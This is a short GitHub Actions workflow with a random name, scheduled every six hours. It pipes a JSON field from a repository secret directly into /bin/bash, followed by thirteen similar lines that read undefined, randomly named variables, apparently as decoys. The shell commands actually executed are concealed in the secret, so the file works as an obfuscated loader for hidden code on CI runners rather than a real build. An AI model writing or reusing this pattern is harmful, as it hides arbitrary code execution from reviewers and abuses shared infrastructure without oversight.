name: admireferrari

on:
  workflow_dispatch:
  schedule:
    - cron: '25 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: admireferrari
        env:
          p55330: ${{ secrets.p55330 }}
        run: |
          echo $p55330 | jq -r .b546 | /bin/bash
          echo $qjre90 | jq -r .eog18717 | /bin/bash
          echo $c57157 | jq -r .ehr9137 | /bin/bash
          echo $i162 | jq -r .t9 | /bin/bash
          echo $c1 | jq -r .dcki76 | /bin/bash
          echo $hvp15 | jq -r .dobe77991 | /bin/bash
          echo $prm67 | jq -r .evvbo6803 | /bin/bash
          echo $rtueu3 | jq -r .xuuu9 | /bin/bash
          echo $c5148 | jq -r .kxhox1511 | /bin/bash
          echo $nae0251 | jq -r .svxv27449 | /bin/bash
          echo $adwya879 | jq -r .s2 | /bin/bash
          echo $kjoin4162 | jq -r .kefan48 | /bin/bash
          echo $lacny04 | jq -r .xwred7 | /bin/bash
          echo $zf696 | jq -r .pc9 | /bin/bash

